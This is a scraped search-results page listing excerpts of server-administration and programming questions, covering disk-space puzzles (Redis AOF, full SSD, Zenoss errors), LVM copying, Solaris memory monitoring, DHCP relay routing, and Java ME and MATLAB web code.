Search Results

Search found 580 results on 24 pages for 'df'.

Page 9/24 | < Previous Page | 5 6 7 8 9 10 11 12 13 14 15 16  | Next Page >

  • Redis 2.0.3 would not let go of deleted appendonly.aof file after BGREWRITEAOF

    - by Alexander Gladysh
    Ubuntu 10.04.2, Redis 2.0.3 (more details at the end of the question). My AOF file for Redis is getting too large, to the point where it soon would threaten to take whole free disk space on my small-HDD VPS box: $ df -h Filesystem Size Used Avail Use% Mounted on /dev/xvda 32G 24G 6.7G 78% / $ ls -la total 3866688 drwxr-xr-x 2 redis redis 4096 2011-03-02 00:11 . drwxr-xr-x 29 root root 4096 2011-01-24 15:58 .. -rw-r----- 1 redis redis 3923246988 2011-03-02 00:14 appendonly.aof -rw-rw---- 1 redis redis 32356467 2011-03-02 00:11 dump.rdb When I run BGREWRITEAOF, the AOF file shrinks, but disk space is not freed: $ ls -la total 95440 drwxr-xr-x 2 redis redis 4096 2011-03-02 00:17 . drwxr-xr-x 29 root root 4096 2011-01-24 15:58 .. -rw-rw---- 1 redis redis 65137639 2011-03-02 00:17 appendonly.aof -rw-rw---- 1 redis redis 32476167 2011-03-02 00:17 dump.rdb $ df -h Filesystem Size Used Avail Use% Mounted on /dev/xvda 32G 24G 6.7G 78% / Sure enough, Redis is still holding the deleted file: $ sudo lsof -p6916 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME ... redis-ser 6916 redis 7r REG 202,0 3923957317 918129 /var/lib/redis/appendonly.aof (deleted) ... redis-ser 6916 redis 10w REG 202,0 66952615 917507 /var/lib/redis/appendonly.aof ... How can I workaround this issue? I can restart Redis this time, but I would really like to avoid doing this on a regular basis. Note that I can not upgrade to 2.2 (upgrade to 2.0.4 is feasible though). More information on my system: $ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 10.04.2 LTS Release: 10.04 Codename: lucid $ uname -a Linux my.box 2.6.32.16-linode28 #1 SMP Sun Jul 25 21:32:42 UTC 2010 i686 GNU/Linux $ redis-cli info redis_version:2.0.3 redis_git_sha1:00000000 redis_git_dirty:0 arch_bits:32 multiplexing_api:epoll process_id:6916 uptime_in_seconds:632728 uptime_in_days:7 connected_clients:2 connected_slaves:0 blocked_clients:0 used_memory:65714632 used_memory_human:62.67M changes_since_last_save:8398 bgsave_in_progress:0 last_save_time:1299014574 bgrewriteaof_in_progress:0 total_connections_received:17 total_commands_processed:55748609 expired_keys:0 hash_max_zipmap_entries:64 hash_max_zipmap_value:512 pubsub_channels:0 pubsub_patterns:0 vm_enabled:0 role:master db0:keys=1,expires=0 db1:keys=18,expires=0

    Read the article

  • copy large LVM volume(14TB) from one server to another

    - by bruce
    recently,I have to copy a very large LVM volume()rom server A to server B. Below is the filesystem of server A and server B - server A [root@AVDVD-Filer ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/vg_avdvdfiler-lv_root 16T 14T 1.5T 91% / tmpfs 3.0G 0 3.0G 0% /dev/shm /dev/cciss/c0d0p1 194M 23M 162M 13% /boot /dev/mapper/vg_avdvdfiler-test 2.3T 201M 2.1T 1% /test /dev/sr0 3.3G 3.3G 0 100% /mnt server B [root@localhost ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/VolGroup-LogVol00 20G 2.5G 16G 14% / tmpfs 3.0G 0 3.0G 0% /dev/shm /dev/cciss/c0d0p1 194M 23M 162M 13% /boot /dev/mapper/VolGroup00-LogVol00 16T 133M 15T 1% /xiangao/lv1 /dev/mapper/VolGroup00-LogVol01 4.7T 190M 4.5T 1% /xiangao/lv2 I want to copy LVM volume /dev/mapper/vg_avdvdfiler-lv_root on server A to LVM volume /dev/mapper/VolGroup00-LogVol00 on server B . The server A and server B is in the same IP segment. IN the LVM volume on server A , there is all average 500M avi wmv mp4 etc. I tried mount /dev/mapper/vg_avdvdfiler-lv_root on server A to server B through NFS , then use cp command copy. It is clear I faild . Because the LVM volume is too big , I do not have good idea . I hope a good solution here. I'm a chinese, my english is very pool. sorry thanks everyone!

    Read the article

  • How should I monitor memory usage/performance in SunOS/Solaris?

    - by exhuma
    Last week we decided to add some SunOS (uname -a = SunOS bbs-sam-belair 5.10 Generic_127128-11 i86pc i386 i86pc) machines into our running munin instance. First off, the machines are pre-configured appliances, so, I want to avoid touching the system too much without supervision of the service provider. But adding it to munin was fairly easy by writing a small socket-service (if anyone is interested, I put it up on github: https://github.com/munin-monitoring/contrib/tree/master/tools/pypmmn) Yesterday, I implemented/adapted the required plugins for our machines. And here the questions start: First, I have not found a way to determine detailed memory usage values. I get the total memory by running prtconf | grep Memory, and the free memory using vmstat. Fiddling together a munin-plugin, gives me the following graph: This is pretty much uninformative. Compare this to the default plugin for linux nodes which has a lot more detail: Most importantly, this shows me how much memory is actually used by applications. So, first question: Is it possible to get detailed memory information on SunOS with the default system tools (i.e. not using top)? Onto the next puzzle: Seeing the graphs, I noticed activity in the "Paging in/out" graphs, even though the memory graph still has unused memory: Upon further investigation, I found out that df reports that /tmp is mounted on swap. Drilling around on the web, I understood that df will display swap, but in fact, it's mounted as a tmpfs. Now I don't know if this explains the swap activity. The default munin-plugin for solaris uses kstat -p -c misc -m cpu_stat to get these values. I find it already strange that this is using the cpu_stat module. So maybe I simply misinterpret the "paging" graphs? Second question: Do the paging graphs indicate that parts of the memory are paged to disk? Or is the activity caused by file operations in /tmp?

    Read the article

  • Zenoss No space left on device Error

    - by Pastelinux
    Site Error An error was encountered while publishing this resource. Sorry, a site error occurred. Traceback (innermost last): Module ZPublisher.Publish, line 231, in publish_module_standard Module ZPublisher.Publish, line 165, in publish Module Zope2.App.startup, line 211, in __call__ Module Products.ZenUI3.browser, line 105, in __call__ Module Products.Five.browser.pagetemplatefile, line 60, in __call__ Module zope.pagetemplate.pagetemplate, line 115, in pt_render Module zope.tal.talinterpreter, line 271, in __call__ Module zope.tal.talinterpreter, line 343, in interpret Module zope.tal.talinterpreter, line 858, in do_defineMacro Module zope.tal.talinterpreter, line 343, in interpret Module zope.tal.talinterpreter, line 533, in do_optTag_tal Module zope.tal.talinterpreter, line 518, in do_optTag Module zope.tal.talinterpreter, line 513, in no_tag Module zope.tal.talinterpreter, line 343, in interpret Module zope.tal.talinterpreter, line 620, in do_insertText_tal Module Products.PageTemplates.Expressions, line 203, in evaluateText Module Products.PageTemplates.Expressions, line 222, in _handleText Module zope.component._api, line 174, in queryUtility Module zope.component.registry, line 165, in queryUtility Module ZODB.Connection, line 834, in setstate Module ZODB.Connection, line 884, in _setstate Module ZEO.ClientStorage, line 815, in load Module ZEO.cache, line 143, in call Module ZEO.cache, line 607, in store IOError: [Errno 28] No space left on device Went in to check my server through zenoss today and it looks like somehow my server is full. Which when i look at my server its only 85% full: unclebob:~# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/unclebob--vg0-unclebob--root 1.9G 1.5G 335M 82% / tmpfs 471M 0 471M 0% /lib/init/rw udev 10M 820K 9.2M 9% /dev tmpfs 471M 0 471M 0% /dev/shm overflow 1.0M 1.0M 0 100% /tmp /dev/hde1 942M 36M 859M 5% /boot unclebob:/tmp# df -i Filesystem Inodes IUsed IFree IUse% Mounted on /dev/mapper/unclebob--vg0-unclebob--root 121920 54844 67076 45% / tmpfs 120489 3 120486 1% /lib/init/rw udev 120489 1520 118969 2% /dev tmpfs 120489 1 120488 1% /dev/shm overflow 120489 14 120475 1% /tmp /dev/hde1 61312 33 61279 1% /boot It looks like theres these two files: .ICE-unix/ .X11-unix/ They had been hidden. I'll remove those. Any idea upon what they maybe? Any ideas on a fix? Probably has something to do with Zenoss

    Read the article

  • Missing MB on a GPT partioned SSD

    - by pisswillis
    I recently installed Arch Linux on an Intel 40GB SSD. I used GPT for partioning (via GNU parted) and created the following partions: /dev/sda1 : 1 MB, no FS, flag=bios_grub /dev/sda2 : 30MB, /boot, ext2, flag=boot /dev/sda3 : 20GB, /home, ext4 /dev/sda4 : ~20GB, /, ext4 After struggling to install grub2 from the livecd environment (which I finally did via grub-install /dev/sda --root-directory=/mnt/ --no-floppy --force) I got a working system. However, when I was inspecting disk usage with df I noticed that my home partition had around 170MB of used space on it. This surprised me because the only things on /home were one users .bashrc, .bash_history, and .lesshst. du confirmed that there was only a few KB of space being used on /home. Why does df report approximately 170MB being used when du does not? Is this space "gone forever", or can I regain it by repartioning and/or reinstalling? When I installed grub2 it said something along the lines of "your embed area is too small", and that I could "use BLOCKLISTS, but BLOCKLISTS are UNRELIABLE". In the end the only way I could get a system booting from the SSD was to use blocklists via the grub-install --force flag. Is this related to the mysterious missing 170MB? Thanks

    Read the article

  • wget crawling search results of news website

    - by kiltek
    I am trying to crawl the search results of a news website using wget. The name of the website is www.voanews.com. After typing in my search keyword and clicking search, it proceeds to the results. Then i can specify a "to" and a "from"-date and hit search again. After this the URL becomes: http://www.voanews.com/search/?st=article&k=mykeyword&df=10%2F01%2F2013&dt=09%2F20%2F2013&ob=dt#article and the actual content of the results is what i want to download. To achieve this I created the following wget-command: wget --reject=js,txt,gif,jpeg,jpg \ --accept=html \ --user-agent=My-Browser \ --recursive --level=2 \ www.voanews.com/search/?st=article&k=germany&df=08%2F21%2F2013&dt=09%2F20%2F2013&ob=dt#article Unfortunately, the crawler doesn't download the search results. It only gets into the upper link bar, which contains the "Home,USA,Africa,Asia,..." links and saves the articles they link to. It seems like he crawler doesn't check the search result links at all. What am I doing wrong and how can I modify the wget command to download the results search list links (and of course the sites they link to) only ?

    Read the article

  • copy large LVM volume(14TB) from one server to another

    - by bruce
    recently,I have to copy a very large LVM volume()rom server A to server B. Below is the filesystem of server A and server B - server A [root@AVDVD-Filer ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/vg_avdvdfiler-lv_root 16T 14T 1.5T 91% / tmpfs 3.0G 0 3.0G 0% /dev/shm /dev/cciss/c0d0p1 194M 23M 162M 13% /boot /dev/mapper/vg_avdvdfiler-test 2.3T 201M 2.1T 1% /test /dev/sr0 3.3G 3.3G 0 100% /mnt server B [root@localhost ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/VolGroup-LogVol00 20G 2.5G 16G 14% / tmpfs 3.0G 0 3.0G 0% /dev/shm /dev/cciss/c0d0p1 194M 23M 162M 13% /boot /dev/mapper/VolGroup00-LogVol00 16T 133M 15T 1% /xiangao/lv1 /dev/mapper/VolGroup00-LogVol01 4.7T 190M 4.5T 1% /xiangao/lv2 I want to copy LVM volume /dev/mapper/vg_avdvdfiler-lv_root on server A to LVM volume /dev/mapper/VolGroup00-LogVol00 on server B . The server A and server B is in the same IP segment. IN the LVM volume on server A , there is all average 500M avi wmv mp4 etc. I tried mount /dev/mapper/vg_avdvdfiler-lv_root on server A to server B through NFS , then use cp command copy. It is clear I faild . Because the LVM volume is too big , I do not have good idea . I hope a good solution here. I'm a chinese, my english is very pool. sorry thanks everyone!

    Read the article

  • ERROR: Not enough space?

    - by dsmoljanovic
    Now this is a very unspecific question. I'm trying to figure out what this message would mean. Here is the story behind it: I'm installing Oracle enterprise manager cloud control (12c r3) on Solaris 10 (5/09). Installer opens up, i enter all needed information and at the last step click Install. It immediately crashes with only "ERROR: Not enough space" written in log and console and nothing else. Now, this could be java error or Solaris error? I'm thinking it's happening either when it starts to copy files or when it tries to launch a process that would do that. What space is it referring to? disk (have ehough), swap (also), memory (yep)... Any ideas are helpful. Edit: i found this exception in the oraInventory logs: oracle.sysman.oii.oiic.OiicInstallAPIException: Not enough space at oracle.sysman.oii.oiic.OiicAPIInstaller.initInstallSession(OiicAPIInstaller.java:2165) at oracle.sysman.oii.oiic.OiicAPIInstaller.initOUIAPISession(OiicAPIInstaller.java:790) at oracle.sysman.install.oneclick.EMGCOUIInstaller.prepareForInstall(EMGCOUIInstaller.java:676) at oracle.sysman.install.oneclick.EMGCSummaryDlgonNext$1.run(EMGCSummaryDlgonNext.java:243) at java.lang.Thread.run(Thread.java:662) at oracle.sysman.install.oneclick.EMGCSummaryDlgonNext.actionsOnClickofNext(EMGCSummaryDlgonNext.java:1067) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) at java.lang.reflect.Method.invoke(Method.java:597) at oracle.sysman.install.oneclick.EMGCUtil.performonClickOfNextForClass(EMGCUtil.java:399) at oracle.sysman.install.oneclick.EMGCUtil.performPageLevelValidationsForSilentInstall(EMGCUtil.java:367) at oracle.sysman.install.oneclick.EMGCInstaller.prepareForSilentInstall(EMGCInstaller.java:1459) at oracle.sysman.install.oneclick.EMGCInstaller.main(EMGCInstaller.java:1553) disk status: bash-3.00$ df -h /tmp Filesystem size used avail capacity Mounted on swap 8.1G 2.7G 5.4G 33% /tmp bash-3.00$ df -h /u01 Filesystem size used avail capacity Mounted on / 275G 28G 244G 11% / swap: root@gs12emcc # swap -s total: 18306040k bytes allocated + 3837808k reserved = 22143848k used, 5712664k available

    Read the article

  • SSD suddenly full

    - by Daniel
    Today the hard drive of our server was suddenly full. The disk usage always stayed around 50 % in the weeks and months before (old data is regularly expunged from the server). I deleted 10 GB of files in /tmp, which strangely freed 51 GB. Here is what I did: root@***:~# df -h Dateisystem Size Used Avail Use% Eingehängt auf /dev/sda3 139G 137G 0 100% / tmpfs 3,9G 0 3,9G 0% /lib/init/rw udev 3,9G 116K 3,9G 1% /dev tmpfs 3,9G 0 3,9G 0% /dev/shm /dev/sda1 985M 25M 910M 3% /boot root@***:/var# du -hs * 3,3M backups 438M cache 9,4G lib 4,0K local 12K lock 76M log 24K mail 4,0K opt 88K run 184K spool 10G tmp 12K www root@***:/var/tmp# find -type f -print0 | xargs -0 rm root@***:/var/tmp# df -h Dateisystem Size Used Avail Use% Eingehängt auf /dev/sda3 139G 81G 51G 62% / tmpfs 3,9G 0 3,9G 0% /lib/init/rw udev 3,9G 116K 3,9G 1% /dev tmpfs 3,9G 0 3,9G 0% /dev/shm /dev/sda1 985M 25M 910M 3% /boot Any explanation as to why deleting 10 GB in /tmp gave me back 51 GB on the disk? Could this point to an SSD failure? Are there any tools for Debian to test SSD health? I already have checked syslog. The first entry relating to this incidient is a mysql message: 1:22:02 [ERROR] /usr/sbin/mysqld: Disk is full writing... So I have absolutely no idea what caused this.

    Read the article

  • disk partition centos

    - by FlourishDNA
    I am setting up server for hosting two WordPress which has size of around 70GB. I have already installed CentOS as OS and I would like to partition the Disk. Is there any tool which can help me or can someone guide me though the process as I am not expert is SSH commands. Here are some output that might help. OS: CentOS release 6.3 fdisk -l Disk /dev/xvdb: 214.7 GB, 214748364800 bytes 255 heads, 63 sectors/track, 26108 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0x000b91e0 Device Boot Start End Blocks Id System Disk /dev/xvda: 21.5 GB, 21474836480 bytes 255 heads, 63 sectors/track, 2610 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0x000e542c Device Boot Start End Blocks Id System /dev/xvda1 * 1 64 512000 83 Linux Partition 1 does not end on cylinder boundary. /dev/xvda2 64 2611 20458496 8e Linux LVM Disk /dev/mapper/vg_flourish-lv_root: 16.7 GB, 16718495744 bytes 255 heads, 63 sectors/track, 2032 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0x00000000 Disk /dev/mapper/vg_flourish-lv_swap: 4227 MB, 4227858432 bytes 255 heads, 63 sectors/track, 514 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0x00000000 df Filesystem 1K-blocks Used Available Use% Mounted on /dev/mapper/vg_flourish-lv_root 16070076 758184 14495560 5% / tmpfs 958500 0 958500 0% /dev/shm /dev/xvda1 495844 31926 438318 7% /boot df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/vg_flourish-lv_root 16G 741M 14G 5% / tmpfs 937M 0 937M 0% /dev/shm /dev/xvda1 485M 32M 429M 7% /boot Thanks

    Read the article

  • Wipe free space on LVM-LUKS (dm-crypt) Volume

    - by peter4887
    My three partitions for my system are created with LVM on a LUKS partition (dm-crypt). These are /home, / and swap. The filesystem is ext4. They are encrypted, because they are on my laptop and I don't want that some laptop thieves get my data. But I often share my laptop with other people so they can access my encrypted partitions. I don't want that these people can recover my cache and all the data I deleted. So I'm now trying to wipe all my free space on /home to prevent against recovering with tools like photorec. (one overwrite should do, the need of multiple overwriting is just a rumor) But still I haven't found any solution to wipe this free space successfully. I tried dd if=/dev/zero of=/home/fillitup bs=512 count=[count of free sectiors] so my partition was complete full of data. df /dev/mapper/home said 100% is used and there are 0 sectors available. But I could still recover gigs of data with photorec, although I selected to recover just form the free space. photorec displays: /dev/mapper/home - 340 GB / 317 GiB (RO) , but df displays that the size of /home is just 313G, why are there these differences and what did the 340GB means? It looks like there is a place on my /dev/mapper/home partition, that I can't access to overwrite, but I can access it to recover. I also checked for corrupted sectors, but there aren't any. Maybe this is the space between my existing files? Did anyone knows why I can't wipe my free space with dd, and how I can find the location of the loads of recoverable files, to securely delete them?

    Read the article

  • How to copy a large LVM volume (14TB) from one server to another?

    - by bruce
    I have to copy a very large LVM volume from server A to server B. Below is the filesystem of server A and server B Server A [root@AVDVD-Filer ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/vg_avdvdfiler-lv_root 16T 14T 1.5T 91% / tmpfs 3.0G 0 3.0G 0% /dev/shm /dev/cciss/c0d0p1 194M 23M 162M 13% /boot /dev/mapper/vg_avdvdfiler-test 2.3T 201M 2.1T 1% /test /dev/sr0 3.3G 3.3G 0 100% /mnt server B [root@localhost ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/VolGroup-LogVol00 20G 2.5G 16G 14% / tmpfs 3.0G 0 3.0G 0% /dev/shm /dev/cciss/c0d0p1 194M 23M 162M 13% /boot /dev/mapper/VolGroup00-LogVol00 16T 133M 15T 1% /xiangao/lv1 /dev/mapper/VolGroup00-LogVol01 4.7T 190M 4.5T 1% /xiangao/lv2 I want to copy the LVM volume /dev/mapper/vg_avdvdfiler-lv_root on server A to LVM volume /dev/mapper/VolGroup00-LogVol00 on server B. Server A and server B are in the same IP segment. In the LVM volume on server A, there is all average 500M avi wmv mp4 etc. I tried mounting /dev/mapper/vg_avdvdfiler-lv_root on server A to server B through NFS, then use cp to copy. It is clear I failed. Because the LVM volume is too big, I do not have good idea why. I hope a good solution here.

    Read the article

  • Using a "white list" for extracting terms for Text Mining, Part 2

    - by [email protected]
    In my last post, we set the groundwork for extracting specific tokens from a white list using a CTXRULE index. In this post, we will populate a table with the extracted tokens and produce a case table suitable for clustering with Oracle Data Mining. Our corpus of documents will be stored in a database table that is defined as create table documents(id NUMBER, text VARCHAR2(4000)); However, any suitable Oracle Text-accepted data type can be used for the text. We then create a table to contain the extracted tokens. The id column contains the unique identifier (or case id) of the document. The token column contains the extracted token. Note that a given document many have many tokens, so there will be one row per token for a given document. create table extracted_tokens (id NUMBER, token VARCHAR2(4000)); The next step is to iterate over the documents and extract the matching tokens using the index and insert them into our token table. We use the MATCHES function for matching the query_string from my_thesaurus_rules with the text. DECLARE     cursor c2 is       select id, text       from documents; BEGIN     for r_c2 in c2 loop        insert into extracted_tokens          select r_c2.id id, main_term token          from my_thesaurus_rules          where matches(query_string,                        r_c2.text)>0;     end loop; END; Now that we have the tokens, we can compute the term frequency - inverse document frequency (TF-IDF) for each token of each document. create table extracted_tokens_tfidf as   with num_docs as (select count(distinct id) doc_cnt                     from extracted_tokens),        tf       as (select a.id, a.token,                            a.token_cnt/b.num_tokens token_freq                     from                        (select id, token, count(*) token_cnt                        from extracted_tokens                        group by id, token) a,                       (select id, count(*) num_tokens                        from extracted_tokens                        group by id) b                     where a.id=b.id),        doc_freq as (select token, count(*) overall_token_cnt                     from extracted_tokens                     group by token)   select tf.id, tf.token,          token_freq * ln(doc_cnt/df.overall_token_cnt) tf_idf   from num_docs,        tf,        doc_freq df   where df.token=tf.token; From the WITH clause, the num_docs query simply counts the number of documents in the corpus. The tf query computes the term (token) frequency by computing the number of times each token appears in a document and divides that by the number of tokens found in the document. The doc_req query counts the number of times the token appears overall in the corpus. In the SELECT clause, we compute the tf_idf. Next, we create the nested table required to produce one record per case, where a case corresponds to an individual document. Here, we COLLECT all the tokens for a given document into the nested column extracted_tokens_tfidf_1. CREATE TABLE extracted_tokens_tfidf_nt              NESTED TABLE extracted_tokens_tfidf_1                  STORE AS extracted_tokens_tfidf_tab AS              select id,                     cast(collect(DM_NESTED_NUMERICAL(token,tf_idf)) as DM_NESTED_NUMERICALS) extracted_tokens_tfidf_1              from extracted_tokens_tfidf              group by id;   To build the clustering model, we create a settings table and then insert the various settings. Most notable are the number of clusters (20), using cosine distance which is better for text, turning off auto data preparation since the values are ready for mining, the number of iterations (20) to get a better model, and the split criterion of size for clusters that are roughly balanced in number of cases assigned. CREATE TABLE km_settings (setting_name  VARCHAR2(30), setting_value VARCHAR2(30)); BEGIN  INSERT INTO km_settings (setting_name, setting_value) VALUES     VALUES (dbms_data_mining.clus_num_clusters, 20);  INSERT INTO km_settings (setting_name, setting_value)     VALUES (dbms_data_mining.kmns_distance, dbms_data_mining.kmns_cosine);   INSERT INTO km_settings (setting_name, setting_value) VALUES     VALUES (dbms_data_mining.prep_auto,dbms_data_mining.prep_auto_off);   INSERT INTO km_settings (setting_name, setting_value) VALUES     VALUES (dbms_data_mining.kmns_iterations,20);   INSERT INTO km_settings (setting_name, setting_value) VALUES     VALUES (dbms_data_mining.kmns_split_criterion,dbms_data_mining.kmns_size);   COMMIT; END; With this in place, we can now build the clustering model. BEGIN     DBMS_DATA_MINING.CREATE_MODEL(     model_name          => 'TEXT_CLUSTERING_MODEL',     mining_function     => dbms_data_mining.clustering,     data_table_name     => 'extracted_tokens_tfidf_nt',     case_id_column_name => 'id',     settings_table_name => 'km_settings'); END;To generate cluster names from this model, check out my earlier post on that topic.

    Read the article

  • Replies to request coming over a relay goes to relay's internal IP, not to original request's source IP

    - by seaquest
    Dhcpd running on Linux gets a dhcp request over dhcrelay which is running on other remote machine. Oct 6 10:09:46 2012 dhcpd: DHCPDISCOVER from 00:1e:68:06:eb:37 (oguz-U300) via 172.16.17.81 tcpdump: listening on eth1, link-type EN10MB (Ethernet), capture size 96 bytes 10:35:01.112500 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 328) 192.168.0.81.67 > 192.168.0.1.67: BOOTP/DHCP, Request from 00:1e:68:06:eb:37, length: 300, hops:1, xid:0xe378fc7e, flags: [none] (0x0000) Gateway IP: 172.16.17.81 Client Ethernet Address: 00:1e:68:06:eb:37 [|bootp] It matches to a subnet and send reply. However reply does not go to the requesting dhcrelay external IP(192.168.0.81). Instead, it goes to the internal interface IP of machine running dhcrelay. And I think because of this remote machine running dhcrelay or the dhcrealy itself discarding packet. Oct 6 10:09:46 2012 dhcpd: DHCPOFFER on 172.16.17.11 to 00:1e:68:06:eb:37 (oguz-U300) via 172.16.17.81 10:35:02.050108 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 328) 192.168.0.1.67 > 172.16.17.81.67: BOOTP/DHCP, Reply, length: 300, hops:1, xid:0xe378fc7e, flags: [none] (0x0000) Your IP: 172.16.17.11 Gateway IP: 172.16.17.81 Client Ethernet Address: 00:1e:68:06:eb:37 [|bootp] Is this a normal behaviour? Machine running dhcrelay: eth1(ext) Link encap:Ethernet HWaddr 00:90:0B:21:43:F4 inet addr:192.168.0.81 Bcast:192.168.0.255 Mask:255.255.255.0 eth2(int) Link encap:Ethernet HWaddr 00:90:0B:21:43:F5 inet addr:172.16.17.81 Bcast:172.16.17.255 Mask:255.255.255.0 3582 ? Ss 0:00 /usr/sbin/dhcrelay -i eth2 192.168.0.1 Machine running dhcpd: eth1 Link encap:Ethernet HWaddr 00:90:0B:23:97:D1 inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0 option domain-name "test.com"; option subnet-mask 255.255.255.0; authoritative; ignore client-updates; ddns-update-style ad-hoc; default-lease-time 86400; max-lease-time 86400; subnet 192.168.0.0 netmask 255.255.255.0 { range 192.168.0.135 192.168.0.169; option broadcast-address 192.168.0.255; option domain-name-servers 192.168.0.1; option domain-name "test.com"; option routers 192.168.0.1; } subnet 172.16.17.0 netmask 255.255.255.0 { local-address 192.168.0.1; server-identifier 192.168.0.1; range 172.16.17.10 172.16.17.11; option broadcast-address 172.16.17.255; option routers 172.16.17.81; } (I put local-address and server-identifier. But this does not help ) Regards, -- Oguz YILMAZ UPDATE: The first problem is found. I have configured dhcrelay only on listening internel interface. It seems (of course) is should also listen to external interface for replies. It appears it is not important where the packet destined to. dhrelay will forward it to internal net. HOWEVER, I have deleted route on dhcpd server to reach 172.16.17.x subnet. It again tries to send reply to 172.16.17.81. Because it does not know the route it send it from default gateway to the internet. eth0: IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 328) 192.168.1.2.67 > 172.16.17.81.67: BOOTP/DHCP, Reply, length: 300, hops:1, xid:0x32830125, secs:3, flags: [none] (0x0000) eth0: Your IP: 172.16.17.11 eth0: Gateway IP: 172.16.17.81 eth0: Client Ethernet Address: 00:1e:68:06:eb:37 [|bootp] How can I force dhcpd to force to send replies to requesting IP? Because, it is not much meaningful to add routes to subnet we distribute IP for. Internet - dhcpd - 192.168.0.1 - SOMENET - 192.168.0.81 - dhcrelay - 172.16.17.0/24 192.168.0.1 has no route for 172.16.17.0 and has no interface directly attached to that net.

    Read the article

  • Java ME scorecard with vector and multiple input fields/screens

    - by proximity
    I have made a scorecard with 5 holes, for each a input field (shots), and a image is shown. The input should be saved into a vector and shown on each hole, eg. hole 2: enter shots, underneath it "total shots: 4" (if you have made 4 shots on hole 1). In the end I would need a sum up of all shots, eg. Hole 1: 4 Hole 2: 3 Hole 3: 2 ... Total: 17 Could someone please help me with this task? { f = new Form("Scorecard"); d = Display.getDisplay(this); mTextField = new TextField("Shots:", "", 2, TextField.NUMERIC); f.append(mTextField); mStatus = new StringItem("Hole 1:", "Par 3, 480m"); f.append(mStatus); try { Image j = Image.createImage("/hole1.png"); ImageItem ii = new ImageItem("", j, 3, "Hole 1"); f.append(ii); } catch (java.io.IOException ioe) {} catch (Exception e) {} f.addCommand(mBackCommand); f.addCommand(mNextCommand); f.addCommand(mExitCommand); f.setCommandListener(this); Display.getDisplay(this).setCurrent(f); } public void startApp() { mBackCommand = new Command("Back", Command.BACK, 0); mNextCommand = new Command("Next", Command.OK, 1); mExitCommand = new Command("Exit", Command.EXIT, 2); } public void pauseApp() { } public void destroyApp(boolean unconditional) { } public void commandAction(Command c, Displayable d) { if (c == mExitCommand) { destroyApp(true); notifyDestroyed(); } else if ( c == mNextCommand) { // -> go to next hole input! save the mTextField input into a vector. } } } ------------------------------ Full code --------------------------------- import java.util.; import javax.microedition.midlet.; import javax.microedition.lcdui.*; public class ScorerMIDlet extends MIDlet implements CommandListener { private Command mExitCommand, mBackCommand, mNextCommand; private Display d; private Form f; private TextField mTextField; private Alert a; private StringItem mHole1; private int b; // repeat holeForm for all five holes and add the input into a vector or array. Display the values in the end after asking for todays date and put todays date in top of the list. Make it possible to go back in the form, eg. hole 3 - hole 2 - hole 1 public void holeForm(int b) { f = new Form("Scorecard"); d = Display.getDisplay(this); mTextField = new TextField("Shots:", "", 2, TextField.NUMERIC); f.append(mTextField); mHole1 = new StringItem("Hole 1:", "Par 5, 480m"); f.append(mHole1); try { Image j = Image.createImage("/hole1.png"); ImageItem ii = new ImageItem("", j, 3, "Hole 1"); f.append(ii); } catch (java.io.IOException ioe) {} catch (Exception e) {} // Set date&time in the end long now = System.currentTimeMillis(); DateField df = new DateField("Playing date:", DateField.DATE_TIME); df.setDate(new Date(now)); f.append(df); f.addCommand(mBackCommand); f.addCommand(mNextCommand); f.addCommand(mExitCommand); f.setCommandListener(this); Display.getDisplay(this).setCurrent(f); } public void startApp() { mBackCommand = new Command("Back", Command.BACK, 0); mNextCommand = new Command("OK-Next", Command.OK, 1); mExitCommand = new Command("Exit", Command.EXIT, 2); b = 0; holeForm(b); } public void pauseApp() {} public void destroyApp(boolean unconditional) {} public void commandAction(Command c, Displayable d) { if (c == mExitCommand) { destroyApp(true); notifyDestroyed(); } else if ( c == mNextCommand) { holeForm(b); } } }

    Read the article

  • MATLAB Builder NE crash apppool on IIS 7.5

    - by Alkersan
    Im developing a web user interface for MATLAB functions with ASP.NET. Ive started with studying demos and stucked with such problem. I created a MyComponent.dll assembly with deploytool from MATLAB 2010a, target framework - 3.5. This component has one function GetKnot() which returns a figure. function df = getKnot() f = figure('Visible', 'off'); knot; df = webfigure(f); close(f); end Then I made simple webapp in visual studio 2008 sp1, with only one page Default.aspx. I added references to MWArray.dll, WebFiguresService.dll and MyComponent.dll. The codeBehind is: using System; using System.Web; using System.Web.UI; using System.Web.UI.WebControls; using MyComponent; using MathWorks.MATLAB.NET.WebFigures; namespace MATLAB_WebApplication { public partial class _Default : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { var myComponentClass = new MyComponentClass(); var x = myComponentClass.getKnot(); //WebFigureControl1.WebFigure = new WebFigure(); } } } When I run this page on Visual Studio`s Development web server - everything is fine, figure works. But when I`m trying to deploy webfigure on my local iis 7.5 which runs on Win7 x32 - iis app pool crashes. There is an entry in System Event Log "A 